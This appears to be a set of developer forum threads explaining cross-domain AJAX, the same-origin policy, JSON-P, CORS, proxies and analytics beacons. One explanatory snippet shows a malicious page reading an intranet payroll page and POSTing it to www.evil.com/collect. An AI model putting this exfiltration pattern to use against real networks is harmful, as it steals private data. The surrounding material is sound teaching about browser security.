From what I understand, cross-domain AJAX calls are not possible for security reasons.
I've understood that it's possible to do it by using JSON-P, though.
My question: why are cross-domain AJAX calls forbidden, but actually possible in a less practical way? It would be simpler to just authorize it.
How are you supposed to handle these kinds of simple scenarios:
geocoding a location by calling Google Maps webservice
fetching Flickr images through its webservice
AJAX to a different domain that belongs to the same application (server farms, for example?)
... (those are just examples)
If I have to wrap/proxy these calls with a server-side script, that's just tedious and time lost... Does that mean you can't build a pure JavaScript application in the end? (If you want to use external web services, I mean.)
why are cross-domain AJAX calls forbidden
You are logged on to your bank, right? OK, I'll just make an Ajax request to your bank and read your account number, sort code, and so on.
How are you supposed to do for those kind of simple scenarios
Server side proxy
JSON-P
CORS
If I have to wrap/proxy these calls with a server-side script, that's just boring and time lost
Many things would be easier if we didn't have to worry about security. We wouldn't need locks on doors, passwords on accounts, etc, etc.
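For concreteness, here is a minimal sketch of the JSON-P option listed above, as it would look in the browser. The endpoint URL and query string are made up, and the "callback" parameter name is an assumption; a real service documents its own parameter and must explicitly support JSON-P.

```javascript
// JSON-P sketch: script tags are not subject to the same-origin policy,
// so the "request" is made by injecting a <script> element. The server
// cooperates by wrapping its JSON in a call to the function we name.
function jsonp(url, onData) {
  var callbackName = 'jsonpCallback_' + Date.now();

  // Temporary global function the remote script will call.
  window[callbackName] = function (data) {
    delete window[callbackName];
    script.parentNode.removeChild(script);
    onData(data);
  };

  var script = document.createElement('script');
  // Assumption: the service accepts a "callback" query parameter.
  script.src = url + (url.indexOf('?') === -1 ? '?' : '&') +
               'callback=' + callbackName;
  document.head.appendChild(script);
}

// Hypothetical usage against a JSON-P-enabled geocoding service:
jsonp('https://api.example.com/geocode?q=Paris', function (result) {
  console.log(result);
});
```

The response the server sends back is literally a call to that generated function, which is why JSON-P only works for GET requests and only against services that opt in; CORS achieves the same opt-in with response headers instead.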
I'm trying to wrap my head around how to really secure AJAX calls of any kind that are publicly available.
Let's say the JavaScript on a public page (so no user authentication of any kind) contains an AJAX call to a PHP script (a REST API or just a script, it doesn't matter) that does a lot of heavy lifting. Any user can look into the source code, find the AJAX call, rebuild it, and execute it a million times a second to DDoS your site that way, which is not so great. At first I thought an HTTP_REFERER check could be helpful, but like any header field it can be manipulated (just use a curl request), so the security gain wouldn't be high.
The next approach was a combination of session IDs, cookies, etc. to build some kind of access key for every page viewer, so that when someone exceeds the limit the AJAX call runs into an error. Sounds great so far, but just by clearing the cookies everything gets reset, so that's no real solution either. But of course: use the IP! Great idea! Users on public networks that share a single IP for internet access will be totally happy when one miscreant blocks the service for all of them by abusing the call... not. So, also no great solution.
So, I’m really stuck here and can’t think of any great answer for my problem.
I also thought about API keys or something similar, but that is information that can also be extracted from the JavaScript source. So how do you prevent other servers from using your service in a proxy-like manner, serving your data to their users? (E.g. you implemented the GMaps API on your website (or any other API) and someone uses your script to access the API with your key.)
tl;dr
Is there any good way to really secure your publicly viewable AJAX calls against being abused, whether for DDoSing your site, presenting your data on other sites, etc.?
I think you're overthinking what AJAX is. When your site makes an AJAX request, on the server side it's the same as any other page request (even if some scripts are more process-intensive). You need to protect your entire site, not just specific scripts. If your server does not have any DDoS protection, it can be attacked through any page. Look into services like CloudFlare.
As @Sage mentioned, it is similar to a normal HTTP request. You can use normal authentication, as the HTTP header/cookie information will be passed to the server every time you make an AJAX call. For a clear view, look at the developer console in your browser. It's the same as exposing your website's root URL. Just make sure you have authentication checks for AJAX calls too.
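The question above mentions a PHP backend; purely as an illustration (in Node.js/Express, with made-up limits and endpoint name), here is a minimal sketch of the kind of per-client throttle the asker was circling around. It does not make the endpoint abuse-proof; it just rejects casual hammering before the heavy lifting runs.

```javascript
// Minimal sketch: throttle a public AJAX endpoint per client IP.
// An in-memory Map is enough for a single process; a real deployment
// would use a shared store and still needs site-wide DDoS protection,
// as the answers above point out.
const express = require('express');
const app = express();

const WINDOW_MS = 60 * 1000;  // assumption: 1-minute window
const MAX_REQUESTS = 30;      // assumption: 30 calls per window per IP
const hits = new Map();       // ip -> { count, windowStart }

function throttle(req, res, next) {
  const now = Date.now();
  const entry = hits.get(req.ip) || { count: 0, windowStart: now };
  if (now - entry.windowStart > WINDOW_MS) {
    entry.count = 0;
    entry.windowStart = now;
  }
  entry.count += 1;
  hits.set(req.ip, entry);
  if (entry.count > MAX_REQUESTS) {
    return res.status(429).send('Too many requests');
  }
  next();
}

// Hypothetical "heavy lifting" endpoint guarded by the throttle.
app.get('/api/heavy', throttle, (req, res) => {
  res.json({ ok: true });
});

app.listen(3000);
```

As the question itself notes, per-IP limits are a blunt instrument for users behind shared networks, which is why the broader advice above (protect the whole site, authenticate where you can) still applies.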
I am new to the REST world. I am writing an ASP.NET MVC application. My requirement is to make a few REST calls from the client. I can either choose to make these REST calls from JavaScript, or I can do that in the C# code in the Controller. Which method is recommended? According to my understanding, the Controller runs on the web server and the JavaScript runs in the browser, so is there any performance degradation if the REST calls are made from the web server?
Can someone suggest the general practice around this? Are there any security gotchas either way?
Thanks
Let us consider the pros and cons of doing this server-side.
PROS:
You can do other processing on the data using the power of the server
You are not subject to cross-domain limitations like you would be with AJAX
Generally you do not have to worry about your server being able to access the resource, whereas on the client you are at the mercy of users' network restrictions, firewalls, etc.
More control over your HTTP request/response lifecycle
CONS:
You will have to consume more bandwidth sending the resulting data down to the client.
You may have to do more work to leverage good caching practices
Dependent on having certain server-side libraries/framework elements
Now although we have a much bigger list of Pros than cons... in the majority of cases you will still want to do this on the client... because the issue of double handling the data is actually a very big one, and will cost you both time and money.
The only reason you should actually do it server side is if you need to do extensive processing on the data, or you cannot circumvent CORS (cross domain) restrictions.
If you are just doing something simple like displaying the information on a webpage, then client side is preferable.
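As a minimal illustration of the client-side case, here is a browser-side call that fetches JSON from a hypothetical REST endpoint and displays it; the URL, response shape, and element ID are assumptions. The endpoint must be same-origin or allow cross-origin requests (CORS).

```javascript
// Client-side sketch: fetch a resource from a REST endpoint and show it,
// so the web server never has to relay the data itself.
var xhr = new XMLHttpRequest();
xhr.open('GET', '/api/orders/123');            // hypothetical endpoint
xhr.setRequestHeader('Accept', 'application/json');
xhr.onload = function () {
  if (xhr.status === 200) {
    var order = JSON.parse(xhr.responseText);  // assumed shape: { total: ... }
    document.getElementById('order-total').textContent = order.total;
  }
};
xhr.send();
```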
It strongly depends on your situation. If you simply display this data on your page without any actions, you can get it from JavaScript. If you want to work with this data, transform it, join it with other data, or anything else, I recommend doing those operations on the server, so get the data on the server too.
Given the simplicity of writing a server-side proxy that fetches data across domains, I'm at a loss as to what the initial intention was in preventing client-side AJAX from making calls across domains. I'm not asking for speculation; I'm looking for documentation from the language designers (or people close to them) about what they thought they were doing, other than simply creating a mild inconvenience for developers.
TIA
It's to prevent the browser from acting as a reverse proxy. Suppose you are browsing http://www.evil.com from a PC at your office, and suppose that office has an intranet with sensitive information at http://intranet.company.com which is only accessible from the local network.
If the cross-domain policy didn't exist, www.evil.com could make AJAX requests to http://intranet.company.com, using your browser as a reverse proxy, and then send that information to www.evil.com with another AJAX request.
This is one of the reasons for the restriction, I guess.
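To make that scenario concrete, this is roughly what a page served from www.evil.com would try to run in the victim's browser; in a real browser the same-origin policy blocks it (the response is never exposed to the page), which is exactly the point. The intranet path and collection URL are hypothetical.

```javascript
// Hypothetical attack that the same-origin policy exists to prevent.
// This script runs inside the victim's browser, which sits on the
// corporate network and may hold intranet cookies.
var steal = new XMLHttpRequest();
steal.open('GET', 'http://intranet.company.com/payroll');  // hypothetical page
steal.onload = function () {
  // Exfiltrate the sensitive content back to the attacker.
  var leak = new XMLHttpRequest();
  leak.open('POST', 'http://www.evil.com/collect');         // hypothetical collector
  leak.send(steal.responseText);
};
steal.send();
```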
If you're the author for myblog.com and you make an XHR to facebook.com, should the request send your facebook cookie credentials? No, that would mean that you could request users' private facebook information from your blog.
If you create a proxy service to do it, your proxy can't access the facebook cookies.
You may also be questioning why JSONP is OK. The reason is that you're loading a script you didn't write, so unless facebook's script decides to send you the information from their JS code, you won't have access to it.
The most important reason for this limit is a security concern: should a JSON request make the browser send and accept cookies or security credentials with a request to another domain? It is not a concern with a server-side proxy, because it doesn't have direct access to the client environment. There was a proposal for safe, sanitized JSON-specific request methods, but it hasn't been implemented anywhere yet.
The difference between direct access and a proxy is cookies and other security-relevant identification/verification information, which are absolutely restricted to one origin.
With those, your browser can access sensitive data. Your proxy won't, as it does not know the user's login data.
Therefore, the proxy is only applicable to public data; as is CORS.
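A minimal sketch of such a proxy (Node.js, with a made-up route and target URL) shows why: the request to the third party is made by the server over its own connection, so none of the visitor's cookies or credentials for that third party are involved, and only public data can come back.

```javascript
// Server-side proxy sketch: the browser calls /proxy on our own origin;
// the server fetches the remote resource and relays it. The remote host
// never sees the user's cookies, only our server's plain request.
const http = require('http');
const https = require('https');

http.createServer((req, res) => {
  if (req.url === '/proxy') {
    // Hypothetical public, third-party endpoint:
    https.get('https://api.example.com/public-data', (remote) => {
      res.writeHead(remote.statusCode, {
        'Content-Type': remote.headers['content-type'] || 'application/json'
      });
      remote.pipe(res);
    }).on('error', () => {
      res.writeHead(502);
      res.end('Upstream error');
    });
  } else {
    res.writeHead(404);
    res.end();
  }
}).listen(8080);
```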
I know you are asking for experts' answers; I'm just a neophyte, and this is my opinion on why the server-side proxy is not a proper final solution:
Building a server-side proxy is not as easy as not building one at all.
It is not always possible, e.g. for a third-party JS widget: you are not going to ask all your publishers to declare a DNS record to integrate your widget, nor to modify the document.domain of their pages, with the collateral issues that brings.
As I read in the book Third Party JavaScript, "it requires loading an intermediary tunnel file before it can make cross-domain requests". On top of that, you bring JSONP into the game, with more tricky juggling.
It is not supported by IE8; also from the above book: "IE8 has a rather odd bug that prevents a top-level domain from communicating with its subdomain even when they both opt into a common domain namespace".
There are several security issues, as people have explained in other answers; for even more, you can check chapter 4.3.2, Message exchange using subdomain proxies, of the above book.
And the most important for me:
It is a hack, just like the JSONP solution; it's time for a standard, reliable, secure, clean and comfortable solution.
But, after re-reading your question, I think I still didn't answer it. So why this AJAX security? Again, I think the answer is:
Because you don't want any web page you visit to be able to make calls from your desktop to any computer or server on your office's intranet.
For quite a long time I have been looking for JavaScript code that can make cross-domain GET requests.
I want to write a script that makes a GET request to Google, fetches the page source, and assigns it to a variable.
Note: the GET requests must be generated from the client's computer and go to a different server (e.g. Google).
Not possible, due to the same-origin policy which restricts AJAX and iframes.
However, AFAIK Google offers its own AJAX API to fetch search results; maybe that's enough for your needs.
But unless the Google servers allow cross-domain calls (which I don't believe they do), there is no way to fetch the data via a pure client-side AJAX connection.
Disclaimer: it might be possible in some browsers by changing some core settings.
Google Analytics embeds a one pixel GIF with a URL like this:
http://www.google-analytics.com/__utm.gif?utmwv=5.1.5&utms=5&utmn=1532897343&utmhn=www.douban.com&utmcs=UTF-8&utmsr=1440x900&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.3%20r181&utmdt=%E8%B1%86%E7%93%A3&utmhid=571356425&utmr=-&utmp=%2F&utmac=UA-7019765-1&utmcc=__utma%3D30149280.1785629903.1314674330.1315290610.1315452707.10%3B%2B__utmz%3D30149280.1315452707.10.7.utmcsr%3Dbiaodianfu.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2Fgoogle-analytics-architecture.html%3B%2B__utmv%3D30149280.162%3B&utmu=qBM~
Why not use an AJAX call? What's the benefit of using a one-pixel GIF?
Because you can't really do cross-domain AJAX (with the exception of CORS, but that's a different story, and a recent phenomenon with less than universal support). AJAX is for same-origin requests. Also, Google Analytics is derived from Urchin, which actually predates the adoption of AJAX.
Requesting an image is pretty standard practice for analytics services: "requesting" something is really a means of sending something to a third-party server. The reason AJAX/CORS doesn't really make sense here is that you're not actually requesting a resource you need on the page, so you want the request itself to be as quick and overhead-free as possible.
The other two ways analytics services occasionally handle sending data from the client are:
Including an invisible iframe, with the query string on the iframe src passing the analytics data
Requesting an image and, instead of returning an image, returning an empty response with an HTTP 204 status.
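A minimal sketch of the image-beacon pattern described above (the collector URL and parameter names are made up): the browser "requests" a tiny image, the data rides along in the query string, nothing in the response is ever read, and no AJAX/CORS machinery is involved.

```javascript
// Analytics beacon sketch: send data by requesting an image from a
// third-party host. Cross-origin image requests are allowed, and the
// response is never inspected.
function track(eventName) {
  var params = 'e=' + encodeURIComponent(eventName) +
               '&page=' + encodeURIComponent(location.pathname) +
               '&t=' + Date.now();  // cache-buster
  var beacon = new Image(1, 1);
  beacon.src = 'https://stats.example.com/collect.gif?' + params;  // hypothetical collector
}

track('pageview');
```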
To maximize compatibility. A cell-phone browser may not support AJAX, for example, and thus may produce inadequate results. But hey, Google does a lot of funky stuff that nobody can explain.